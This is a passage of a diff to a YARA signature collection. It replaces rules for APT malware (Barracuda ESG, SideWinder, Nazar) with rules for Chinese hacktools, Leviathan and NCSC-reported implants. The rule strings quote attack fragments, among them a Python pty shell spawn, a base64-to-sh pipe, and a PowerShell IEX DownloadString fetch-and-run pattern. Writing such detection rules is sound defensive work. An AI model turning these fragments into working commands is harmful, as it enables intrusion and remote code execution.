-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L76-L101"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2476-L2497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e2152e1aa74e1842519e2eecd2acd3ef8eb8d517f3c0ef9f05c983616f223c3"
+		logic_hash = "b66bb4d392881468b33a8ee4458f33bfe7a82d34cc3927eedccd54ad94ff6a04"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "ca72fa64ed0a9c22d341a557c6e7c1b6a7264b0c4de0b6f717dd44bddf550bca"
-		hash2 = "57e4b180fd559f15b59c43fb3335bd59435d4d76c4676e51a06c6b257ce67fb2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
+		hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
+		hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
 
 	strings:
-		$a2 = "/src/runtime/panic.go"
-		$s1 = "main.handleClientRequest" ascii fullword
-		$s2 = "main.sockIP.toAddr" ascii fullword
+		$s1 = "sfUserAppDataRoaming" fullword ascii
+		$s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
+		$s3 = "delphi32.exe" fullword ascii
+		$s4 = "hkeyCurrentUser" fullword ascii
+		$s5 = "%s is not a valid IP address." fullword wide
+		$s6 = "Citadel hooking error" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xbebafeca ) and filesize < 10MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Fscan_Port_Scanner_Output_Jun23 : SCRIPT FILE
+rule SIGNATURE_BASE__Hscan_Hscan_Hscangui : FILE
 {
 	meta:
-		description = "Detects output generated by the command line port scanner FScan"
-		author = "Florian Roth"
-		id = "7eb4b27f-0c5b-5d7e-b759-95d7894d5822"
-		date = "2023-06-15"
+		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "174b0ee4-23ce-59fd-a784-ab58fd13ce67"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L103-L117"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2499-L2519"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49b5055c96d7b7446ee5ae8667a5aa3645f0f98d8b5f2bffcd6ef3b20bc64e05"
-		score = 70
+		logic_hash = "5466c3dd8b2b777186bfab9d0948905eb3692ce05cf4748fb5b7b896dc3cb251"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
+		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
+		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
 
 	strings:
-		$s1 = "[*] NetInfo:" ascii
-		$s2 = ":443 open" ascii
-		$s3 = "   [->]"
+		$s1 = ".\\log\\Hscan.log" fullword ascii
+		$s2 = ".\\report\\%s-%s.html" fullword ascii
+		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
+		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
+		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
 
 	condition:
-		filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_PY_Shell_Spawn_Jun23_1 : SCRIPT
+rule SIGNATURE_BASE_Kiwi_Tools : FILE
 {
 	meta:
-		description = "Detects suspicious one-liner to spawn a shell using Python"
-		author = "Florian Roth"
-		id = "15fd2c9a-c425-5d4d-9209-fd3826074d6c"
-		date = "2023-06-15"
+		description = "Chinese Hacktool Set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "000f0081-b035-5c73-8da2-addde2b55303"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L119-L131"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2521-L2554"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "63e94447930d5a00399de753076facbfb2bf18dd8c815f01aaefd14678aea034"
-		score = 70
+		logic_hash = "ce7b3c7d57740257013d9d589444a3b53e81254619bd3f09ece917c70bba03ce"
+		score = 75
 		quality = 85
-		tags = "SCRIPT"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
+		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
+		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
+		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
+		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		hash10 = "febadc01a64a071816eac61a85418711debaf233"
+		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
+		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
+		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
+		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
 
 	strings:
-		$x1 = "python -c import pty;pty.spawn(\"/bin/" ascii
+		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
+		$s2 = "Benjamin Delpy" fullword ascii
+		$s3 = "GlobalSign" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Hunting_LUA_SEASIDE_1 : FILE
+rule SIGNATURE_BASE_Kiwi_Tools_Gentil_Kiwi : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SEASIDE samples."
-		author = "Mandiant"
-		id = "86eaff7b-4ca0-53cd-8886-da66a36c778f"
-		date = "2023-06-15"
+		description = "Chinese Hacktool Set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ad54580-b10b-5b17-8d8a-510e210e04d1"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L136-L152"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2556-L2587"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cd2813f0260d63ad5adf0446253c2172"
-		logic_hash = "82b61325a78bf8ab09d426cfadceb614a256dfcafb2e1f75595de63593ed2574"
-		score = 70
+		logic_hash = "1a88bb31e985ae2119b578494ce9130204b41eece5929865c0822cdc82eaba75"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
+		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
+		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
+		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
+		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
+		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
+		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
+		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		hash9 = "febadc01a64a071816eac61a85418711debaf233"
+		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
+		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
+		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
+		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
+		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
 
 	strings:
-		$s1 = "function on_helo()"
-		$s2 = "local bindex,eindex = string.find(helo,'.onion')"
-		$s3 = "helosend = 'pd'..' '..helosend"
-		$s4 = "os.execute(helosend)"
+		$s1 = "mimikatz" fullword wide
+		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
+		$s3 = "Gentil Kiwi" fullword wide
 
 	condition:
-		filesize < 1MB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Hunting_Linux_WHIRLPOOL_1 : FILE
+rule SIGNATURE_BASE_Sedll_Javascript_Decryptor : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in WHIRLPOOL samples."
-		author = "Mandiant"
-		id = "a997bd65-c502-53a0-8bb8-62daaa916f0d"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L154-L173"
+		description = "Detects SeDll - DLL is used for decrypting and executing another JavaScript backdoor such as Orz"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8fafd139-0c4f-5c51-af8f-b4917d2d69b0"
+		date = "2017-10-18"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "177add288b289d43236d2dba33e65956"
-		logic_hash = "d03c0e292b9b97bbf76585fc74208e4263d753807b8e4a445be80d41264d5432"
-		score = 70
+		logic_hash = "26ef61d8bb1764dddd951526902fb510fbacc8b808fe99ddee1956dc8b59bd1d"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "146aa9a0ec013aa5bdba9ea9d29f59d48d43bc17c6a20b74bb8c521dbb5bc6f4"
 
 	strings:
-		$s1 = "error -1 exit" fullword
-		$s2 = "create socket error: %s(error: %d)\n" fullword
-		$s3 = "connect error: %s(error: %d)\n" fullword
-		$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
-		$c1 = "plain_connect" fullword
-		$c2 = "ssl_connect" fullword
-		$c3 = "SSLShell.c" fullword
+		$x1 = "SEDll_Win32.dll" fullword ascii
+		$x2 = "regsvr32 /s \"%s\" DR __CIM__" wide
+		$s1 = "WScriptW" fullword ascii
+		$s2 = "IWScript" fullword ascii
+		$s3 = "%s\\%s~%d" fullword wide
+		$s4 = "PutBlockToFileWW" fullword ascii
+		$s5 = "CheckUpAndDownWW" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 15MB and ( all of ( $s* ) or all of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_SKIPJACK_1
+rule SIGNATURE_BASE_Leviathan_Cobaltstrike_Sample_1 : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SKIPJACK installation script."
-		author = "Mandiant"
-		id = "0026375c-7f37-5ef9-bd55-5b9fc499e5d2"
-		date = "2023-06-15"
+		description = "Detects Cobalt Strike sample from Leviathan report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e29072d8-b4ea-5e94-8a1c-0a1baec5f423"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L175-L193"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L33-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e4e86c273a2b67a605f5d4686783e0cc"
-		logic_hash = "8890cd9ab8190f12997e0653e43c89816df03c7bd41842e5ad21b1986819843e"
-		score = 70
+		logic_hash = "9ebc8c2f8ddba302e0fbde69e27986236053a3d31c50cf3a2f979a9ebb90907f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362"
 
 	strings:
-		$str1 = "hdr:name() == 'Content-ID'" base64
-		$str2 = "hdr:body() ~= nil" base64
-		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
-		$str4 = "openssl aes-256-cbc" base64
-		$str5 = "mod_content.lua"
-		$str6 = "#!/bin/sh"
+		$x1 = "a54c81.dll" fullword ascii
+		$x2 = "%d is an x64 process (can't inject x86 content)" fullword ascii
+		$x3 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$s2 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$s3 = "could not run command (w/ token) because of its length of %d bytes!" fullword ascii
+		$s4 = "could not write to process memory: %d" fullword ascii
+		$s5 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+		$s6 = "Could not connect to pipe (%s): %d" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SKIPJACK_2
+rule SIGNATURE_BASE_Mockdll_Gen : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SKIPJACK samples."
-		author = "Mandiant"
-		id = "e1eac294-fe60-5bb2-bae4-0f7bcbe6b1db"
-		date = "2023-06-15"
+		description = "Detects MockDll - regsvr DLL loader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "904a0649-27e7-5024-aa6b-ddb23bba6202"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L195-L212"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L57-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "87847445f9524671022d70f2a812728f"
-		logic_hash = "093e8857c410bd30a076f87ef63d7e1e66f50e3dce75b4add67161782386ee24"
-		score = 70
+		logic_hash = "cbe7b816199d251bfdc751f46bd95da6f0447ebd56f564619d24eb08bbd4a2c7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922"
+		hash2 = "80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca"
 
 	strings:
-		$str1 = "hdr:name() == 'Content-ID'"
-		$str2 = "hdr:body() ~= nil"
-		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
-		$str4 = "openssl aes-256-cbc"
-		$str5 = "| base64 -d| sh 2>"
+		$x1 = "mock_run_ini_Win32.dll" fullword ascii
+		$x2 = "mock_run_ini_x64.dll" fullword ascii
+		$s1 = "RealCmd=%s %s" fullword ascii
+		$s2 = "MockModule=%s" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SEASPRAY_1
+rule SIGNATURE_BASE_Vbscript_Favicon_File : FILE
 {
 	meta:
-		description = "Hunting rule looking for strings observed in SEASPRAY samples."
-		author = "Mandiant"
-		id = "8c744b85-b61e-56d0-8a9e-ae6a954e1b95"
-		date = "2023-06-15"
-		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L213-L228"
+		description = "VBScript cloaked as Favicon file used in Leviathan incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "84147d4e-d062-5ba4-8019-6bf4b72c36c6"
+		date = "2017-10-18"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/MZ7dRg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_leviathan.yar#L77-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "35cf6faf442d325961935f660e2ab5a0"
-		logic_hash = "856bfb47557b60f69aa1141477d6ce446ea13ebbe899022d7996ceef08bdefbb"
-		score = 70
+		logic_hash = "5b89ea916adf6864c8b1cb7cd7ee6d74ea47bf17a0b03cc513046f8d260ae376"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36"
 
 	strings:
-		$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
-		$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
-		$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
+		$x1 = "myxml = '<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\"?>';myxml = myxml +'<root>" ascii
+		$x2 = ".Run \"taskkill /im mshta.exe" ascii
+		$x3 = "<script language=\"VBScript\">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :" ascii
+		$s1 = ".ExpandEnvironmentStrings(\"%ALLUSERSPROFILE%\") &" ascii
+		$s2 = ".ExpandEnvironmentStrings(\"%temp%\") & " ascii
 
 	condition:
-		all of them
+		filesize < 100KB and ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_Sidewinder_NET_Loader_Aug_2020_1_1 : FILE
+rule SIGNATURE_BASE_Bytes_Used_In_AES_Key_Generation : FILE
 {
 	meta:
-		description = "Detected the NET loader used by SideWinder group (August 2020)"
-		author = "Arkbird_SOLG"
-		id = "61d96e2a-3a43-586f-85bc-a2c53b1318e6"
-		date = "2020-08-24"
+		description = "Detects Backdoor.goodor"
+		author = "NCSC"
+		id = "26a549dd-cbd2-5abc-8d9d-5ea354d0ece8"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sidewinder.yar#L4-L22"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L9-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ee7029143c589f26e6c325e163bfac85507c950f09778bd51ec2bdf4d4263fa"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "221f5ea0a0224a96588912e7ddfbafd20b0b10c119395ca14d1138c284d7b79e"
 		score = 75
 		quality = 83
 		tags = "FILE"
-		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$a1 = "DUSER.dll" fullword wide
-		$s1 = "UHJvZ3JhbQ==" fullword wide
-		$s2 = "U3RhcnQ=" fullword wide
-		$s3 = ".tmp           " fullword wide
-		$s4 = "FileRipper" fullword ascii
-		$s5 = "copytight @" fullword wide
+		$a1 = {35 34 36 35 4B 4A 55 54 5E 49 55 5F 29 7B 68 36 35 67 34 36 64 66 35 68}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and $a1 and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_APT_MAL_Sidewinder_Implant : FILE
+rule SIGNATURE_BASE_Partial_Implant_ID : FILE
 {
 	meta:
-		description = "Detects SideWinder final payload"
-		author = "AT&T Alien Labs"
-		id = "3a420c9c-7821-5405-8d4d-6931d0f311ba"
-		date = "2023-12-05"
+		description = "Detects implant from NCSC report"
+		author = "NCSC"
+		id = "15144f4a-2c96-57f0-b7e9-adbac477c38a"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sidewinder.yar#L24-L50"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L24-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bfad86dbdc04463e7e4cc126fd05fc9107617a7ea1bd3f283c0e0170862bd59b"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "d0a29bed3c19007cb08427769918b0a02d5d247211a1ceaff31aed5839c78966"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		hash1 = "c568238dcf1e30d55a398579a4704ddb8196b685"
 
 	strings:
-		$code = { 1B 30 05 00 C7 00 00 00 00 00 00 00 02 28 03 00
-               00 06 7D 12 00 00 04 02 02 FE 06 23 00 00 06 73
-               5B 00 00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A
-               7D 13 00 00 04 02 02 FE 06 24 00 00 06 73 5B 00
-               00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A 7D 15
-               00 00 04 02 7B 12 00 00 04 6F 0E 00 00 06 2C 1D
-               02 28 1F 00 00 06 02 7B 12 00 00 04 16 6F 0F 00
-               00 06 02 7B 12 00 00 04 6F 06 00 00 06 02 7B 12
-               00 00 04 6F 10 00 00 06 2C 23 02 28 20 00 00 06
-               02 28 21 00 00 06 02 7B 12 00 00 04 16 }
-		$strings = {
-         2E 00 73 00 69 00 66 00 00 09 2E 00 66 00 6C 00
-         63 00 00 1B 73 00 65 00 6C 00 65 00 63 00 74 00
-         65 00 64 00 46 00 69 00 6C 00 65 00 73
-      }
+		$a1 = {38 38 31 34 35 36 46 43}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_APT_Nazar_Svchost_Commands
+rule SIGNATURE_BASE_Sleep_Timer_Choice : FILE
 {
 	meta:
-		description = "Detects Nazar's svchost based on supported commands"
-		author = "Itay Cohen"
-		id = "3e02381d-de03-50c8-8bde-2974ee96b7c1"
-		date = "2020-04-26"
+		description = "Detects malware from NCSC report"
+		author = "NCSC"
+		id = "c64db0dd-2858-5508-ac51-d3318113a060"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.epicturla.com/blog/the-lost-nazar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nazar.yar#L1-L18"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L39-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c71e8a3b2d69c51ed3f822f62b90906fc0a21d32f1f1850cdef71c335964f9b1"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "5d2b656aabb113c50805d4af0faa62f579547dd4ec328ff2778fab64d778b8b9"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
-		hash2 = "be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728"
+		tags = "FILE"
 
 	strings:
-		$str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }
-		$str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }
-		$str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }
-		$str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }
-		$str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }
+		$a1 = {8b0424b90f00000083f9ff743499f7f98d420f}
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $a* )
 }
-rule SIGNATURE_BASE_EXT_APT_Bitter_Win32K_0Day_Feb21 : FILE
+rule SIGNATURE_BASE_User_Function_String
 {
 	meta:
-		description = "Detects code that exploits a Windows 0day exploited by Bitter APT group"
-		author = "dbappsecurity_lieying_lab"
-		id = "b1892b52-4b94-5571-ad63-8750a321f1f2"
-		date = "2021-01-01"
+		description = "Detects user function string from NCSC report"
+		author = "NCSC"
+		id = "563ac6af-6b37-53c6-ae13-d97e31edb088"
+		date = "2018-04-06"
 		modified = "2023-12-05"
-		reference = "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bitter.yar#L2-L21"
+		reference = "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ncsc_report_04_2018.yar#L54-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "84a8d0ae14469eb6431e73295d821609c7a8b313630d645085ffd8faff6e5e43"
+		hash = "b5278301da06450fe4442a25dda2d83d21485be63598642573f59c59e980ad46"
+		logic_hash = "04821d1d5c12b5a9aca3c5b4be9f7a7d35320ad1503ccbdadebc7710c613a976"
 		score = 75
